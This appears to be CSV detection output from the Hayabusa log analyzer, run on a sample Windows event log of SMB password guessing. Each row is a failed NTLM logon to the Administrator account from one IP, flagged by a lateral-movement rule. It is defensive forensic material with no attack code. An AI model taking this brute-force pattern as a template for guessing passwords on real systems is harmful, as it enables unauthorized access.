2016-09-20 01:51:46.204 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9mnUbGMnlrOR8Tv4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CJGMWqgmbXABdPvB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2W9BbDYgC6vhqU3o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q6DYsaih1Yhb2uOD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q4o93QpJL4pxx94q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lQf1OsHb4lpgMPbl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HcJUYelneVqBQjr9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I0d6daEeIadJRbBI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SQ1hvZeT9aulbu4g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 75RBCjr2eRDLhTqW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.700 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: maMlpuzhleuQHhIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AkpNfbOHUr7cY52z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R7SUyYbLPfPAGUfw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7clwftf7R0uNbqJ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IsIyPcMAPnlxJa12 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4CKcyo1Ec4rs3Z2g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:46.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZlzKvZLO8CDotkbE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.010 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EyRpYYtmD8389Yvp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t3Pg0H9Gncoyr45m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zksaaJ7Z1wuy4PMx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.154 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3WdYAEdfWxLdM1rh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VyYFJRy0cxPfqDFh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hv2Lz1h1bG6UatVR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FLKPLfEe3PpEzRNc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZJWv7ggzCSyEznOI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZUtR9CNfKMHQMd7T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.433 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6fYNHuRTqi15cRkL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.488 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DvxZHwJwrBYXlEyv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jscJTJjhKvCtDl8q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.575 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZEIEjcimMyHWUsp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.618 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 30OdVRH9ZATLezsR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJ1OSBVZHKmyOzj8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.694 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JanG6Q0oYpTdm9mC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.736 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PWCwDYL3T7TAdb0J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mRdyZaio1HjUKlNQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VjiRnExy9TzZTG0R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ztUyQpl8c9RoAr1j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.909 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jC23QAFM07q7cfVo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:47.957 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TSM8lmdOFoDslQNa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sGZaUGAT1oXmnGLB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZMNo21pTA67pb7Go | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.091 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EiTZCqK3m4icL1Vi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZaZ2mnoihX1Ec4di | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ihm9zaXkmWklXk4u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yLIZ3tlw9VlQmK28 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.249 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GVHzJHTi55NbxXYY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1FROeEnMLna2fTTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pio6ZZ9pV0pS2Whi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h1aD2w5U5K9ND5HV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zF8Jb4GpG4D3xn9i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Edv4GwGfL156V1xe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.570 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Irvneva9RFn44iII | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.617 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dHtJFI8OL9kJylL5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F5Q4h62T77hGjhKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DdSALwo9td9xUeBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1kYfoqz1r1NuEn04 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.791 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7X400gufqdunUa8j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lLR8z7g0GY8r7a1r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.867 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QHMztrxiKBGtNqkp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7eBQevVhmZs5gHFD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.953 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lyQCs0PG6fGzpidu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:48.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XnsPjnCieyoFIbJZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ku6mjVaG1lCJrAo1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VwiyVIWHOGuHzhdO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 92v1rXcj5c0Lt3OF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yO2JYd6FfM2Y7px9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ltr5g8ZWUAdrPKxg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fjiPMy5uOTbbmaQ5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HDRVOzxca9wDJziV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DV28RjUK26Je2Dr9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.382 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: seoetT43w0S3FEss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IdIU9Q9Ig4Bd3Aps | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jGzuHSHT59Qnp5jI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wPA1J7aQrZ064WSf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
